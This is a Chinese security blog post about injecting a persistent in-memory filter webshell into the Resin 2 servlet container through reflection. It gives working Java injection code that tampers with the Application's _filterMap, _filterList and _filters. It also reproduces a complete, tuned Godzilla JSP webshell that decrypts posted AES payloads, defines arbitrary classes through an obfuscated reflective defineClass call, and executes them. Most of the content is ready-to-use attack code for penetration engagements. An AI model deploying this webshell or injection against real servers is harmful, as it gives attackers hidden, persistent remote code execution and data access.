Loading

Java安全之Resin2内存马

Java安全之Resin2内存马

环境

resin2.1.17

添加Filter分析

依然是web.xml注册一个filter,debug进去看注册流程

debug dofilter逻辑时看到如下代码,最终走入this._filterChain = this._application.buildFilterChain(this, this._config);去build filterchain。并且貌似是初始化的时候才会去buildfilterchain,当后面第二次再走时,这里的_filterchain已经是有值的了。

this._application应为上下文对象,继续往下跟通过QFilterConfig#createFilter来创建了一个Filter,之后new 了一个FilterChain

注意下面三个对象,添加上即可

_filterMap

首先看FilterMap构造,主要是Regexp,QFilterConfig后面再说

可以反射实例化之后调用方法或者set属性来设置值

class FilterMap {
    static L10N L;
    private String servletName;
    private Regexp regexp;
    private Object data;

    FilterMap() {
    }

    void setServletName(String servletName) {
        this.servletName = servletName;
    }

    void setRegexp(String regexpPattern, String flags) throws Exception {
        this.regexp = new Regexp(regexpPattern, flags);
    }

    void setURLPattern(String urlPattern, String flags) throws ServletException {
        this.regexp = this.urlPatternToRegexp(urlPattern, flags);
    }

下面看Regexp ,其实就是一个正则来控制的路由处理

^.*$
^(?=/)|^$

调用有参构造即可

_filters

hashtable对象,key为filtername,value为QFilterConfig对象,key可以随便伪造成个正常的

_filterList

直接add一个QFilterConfig元素即可

看到QConfigFilter,Registry为空就走if的逻辑,传入构造好的属性即可

package com.caucho.server.http;

import com.caucho.util.BeanUtil;
import com.caucho.util.CauchoSystem;
import com.caucho.util.L10N;
import com.caucho.util.RegistryNode;
import java.util.Collections;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Iterator;
import javax.servlet.Filter;
import javax.servlet.FilterConfig;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;

class QFilterConfig implements FilterConfig {
    static L10N L;
    private static HashMap _configElements;
    private Application _application;
    private RegistryNode _registry;
    private RegistryNode _initRegistry;
    private String _name;
    private String _className;
    private HashMap _init;
    private Filter _filter;

    QFilterConfig(Application application, String name, String defaultClassName, RegistryNode registry) throws ServletException {
        this._application = application;
        this._registry = registry;
        this._name = name;
        this._init = new HashMap();
        if (registry == null) {
            if (defaultClassName == null) {
                this._className = name;
            } else {
                this._className = defaultClassName;
            }

        } else {
            this._className = registry.getString("filter-class", defaultClassName);
            Iterator iter = registry.iterator();

            while(iter.hasNext()) {
                RegistryNode node = (RegistryNode)iter.next();
                if (node.getName().equals("init-param")) {
                    try {
                        application.fillParam(node, this._init);
                    } catch (ServletException var8) {
                        throw var8;
                    } catch (Exception var9) {
                        throw new ServletException(var9);
                    }
                } else if (node.getName().equals("init")) {
                    this._initRegistry = node;
                } else if (_configElements.get(node.getName()) == null) {
                    throw Application.error(node, L.l("unknown element `{0}' in {1}", node.getName(), registry.getName()));
                }
            }

        }
    }

后面就是用c0ny1师傅的java-object-searcher工具挖掘Application和Request在当前线程上下文的位置即可。

//设置搜索类型包含ServletRequest,RequstGroup,Request...等关键字的对象
List<Keyword> keys = new ArrayList();
keys.add(new Keyword.Builder().setField_type("Request").build());
keys.add(new Keyword.Builder().setField_type("Application").build());
//新建一个广度优先搜索Thread.currentThread()的搜索器
SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys);
//打开调试模式
searcher.setIs_debug(true);
//挖掘深度为20
searcher.setMax_search_depth(20);
//设置报告保存位置
searcher.setReport_save_path("/tmp/");
searcher.searchObject();

result

# Request
TargetObject = {java.lang.Thread} 
  ---> target = {com.caucho.server.TcpConnection} 
   ---> request = {com.caucho.server.http.HttpRequest}

        
# Application        
TargetObject = {java.lang.Thread} 
  ---> contextClassLoader = {com.caucho.java.CompilingClassLoader} 
       ---> attributes = {java.util.Hashtable} 
         ---> attributes = {com.caucho.server.http.Application}

后面直接添加即可

主要代码

    private static void doInject(){
        filterName = "CharacterEncodingFilter-" + System.nanoTime();
        try {
            if (APPLICATION !=null){

                // Regexp
//                Class RegexpClazz = getClazz("com.caucho.regexp.Regexp");
//                Constructor RegexpConstructor = RegexpClazz.getDeclaredConstructor(String.class);
//                Object regexpObj = RegexpConstructor.newInstance("^(?=/)|^$");

                // QFilterConfig
                Class QFilterConfigclazz = getClazz("com.caucho.server.http.QFilterConfig");
                Constructor QFilterConfigConstructor = QFilterConfigclazz.getDeclaredConstructor(getClazz("com.caucho.server.http.Application"), String.class, String.class, getClazz("com.caucho.util.RegistryNode"));
                QFilterConfigConstructor.setAccessible(true);
                Object QFilterConfigObj = QFilterConfigConstructor.newInstance(APPLICATION, filterName, "HiganbanaFilter", null);

                // FilterMap
                Class filterMapClazz = getClazz("com.caucho.server.http.FilterMap");
                Constructor filterMapConstructor = filterMapClazz.getDeclaredConstructor();
                filterMapConstructor.setAccessible(true);
                Object filterMap = filterMapConstructor.newInstance();
                // set FilterMap regexp
                Method setRegexpMethod = filterMap.getClass().getDeclaredMethod("setURLPattern", String.class, String.class);
                setRegexpMethod.setAccessible(true);
                setRegexpMethod.invoke(filterMap,"/*", null);

                // set FilterMap data
                Method setDataMethod = filterMap.getClass().getDeclaredMethod("setData", Object.class);
                setDataMethod.setAccessible(true);
                setDataMethod.invoke(filterMap,QFilterConfigObj);

                // add FilterMap 2 _filterMap
                ArrayList _filterMap = (ArrayList) getFV(APPLICATION, "_filterMap");
                _filterMap.add(filterMap);

                // add QFilterConfig 2 _filterList
                ArrayList _filterList = (ArrayList) getFV(APPLICATION, "_filterList");
                _filterList.add(QFilterConfigObj);

                // put QFilterConfig 2 _filters
                Hashtable _filters = (Hashtable) getFV(APPLICATION, "_filters");
                _filters.put(filterName, QFilterConfigObj);

            }


        } catch (Exception e) {

        }

    }

    private static void getApplication(){
        Thread thread = Thread.currentThread();
        ClassLoader contextClassLoader = thread.getContextClassLoader();
        Hashtable attributesObj1 = (Hashtable) getFV(contextClassLoader,"attributes");
        APPLICATION = attributesObj1.get("caucho.application");
    }

但是有个弊端,debug逻辑的时候发现,只有在当前web.xml中已经存在有filter才能添加进去。暂未解决该问题。
并且即便是_filterList.add(0, QFilterConfigObj); 虽然会加到第一个 但是顺序好像会有问题,不是根据ArrayList来调用doFilter方法的。

Godzilla

解决思路

将jsp🐎写成servlet debug

第一次请求

base64deocode后的data

aes decode后 data

第二次请求

base64decode后 data

aes decode后 data

arrout输出

第二次输出

最后定位到问题为md5操作不可以写在dopost方法里,否则每次请求都回去md5导致密码和key一直在改变,暂时的解决办法是手动md5将该值放到属性中,所以使用哥斯拉时 key的值尽量又臭又长,防止被逆。

最终Godzilla jsp password/token

<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%!
    String xc="94a08da1fecbb6e8";
    String pass="password";
    String md5 = "e993fa7e0bd02f84492c51357d1f5919".toUpperCase();
    Class payload ;
%>
<%


    Class base64;
    byte[] value = null;
    try {
        base64 = Class.forName("java.util.Base64");
        Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
        value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{request.getParameter(pass)});
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Decoder");
            Object decoder = base64.newInstance();
            value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{request.getParameter(pass)});
        } catch (Exception e2) {
        }
    }
    byte[] data = value;
    boolean decode = false;
    try {
        javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
        c.init(decode ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));
        data = c.doFinal(data);
    } catch (Exception e) {

    }

    URLClassLoader urlClassLoader;
    try {
        if (payload == null) {
            urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
            Method defMethod = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100, 101, 102, 105, 110, 101, 67, 108, 97, 115, 115}), new Class[]{byte[].class, int.class, int.class});
            defMethod.setAccessible(true);
            payload = (Class) defMethod.invoke(urlClassLoader, new Object[]{data, new Integer(0), new Integer(data.length)});
        } else {
            ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
            Object f = payload.newInstance();
            f.equals(arrOut);
            f.equals(data);
            response.getWriter().write(md5.substring(0, 16));
            f.toString();
            boolean n = true;
            try {
                javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
                c.init(n ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));
                byte[] tmp = c.doFinal(arrOut.toByteArray());

                
                try {
                    base64 = Class.forName("java.util.Base64");
                    Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
                    String tmpvalue = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{tmp});
                    response.getWriter().write(tmpvalue);
                    response.getWriter().write(md5.substring(16));
                } catch (Exception e) {
                    try {
                        base64 = Class.forName("sun.misc.BASE64Encoder");
                        Object Encoder = base64.newInstance();
                        String tmpvalue = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{tmp});
                        response.getWriter().write(tmpvalue);
                        response.getWriter().write(md5.substring(16));
                    } catch (Exception e2) {

                    }
                }
            } catch (Exception e) {

            }

        }
    } catch (Exception e) {
    }

%>

最后

项目遇到的感觉比较有趣且极端的问题,虽然也不是很好的解决方案。

posted @ 2022-11-08 22:55  Zh1z3ven  阅读(342)  评论(0编辑  收藏  举报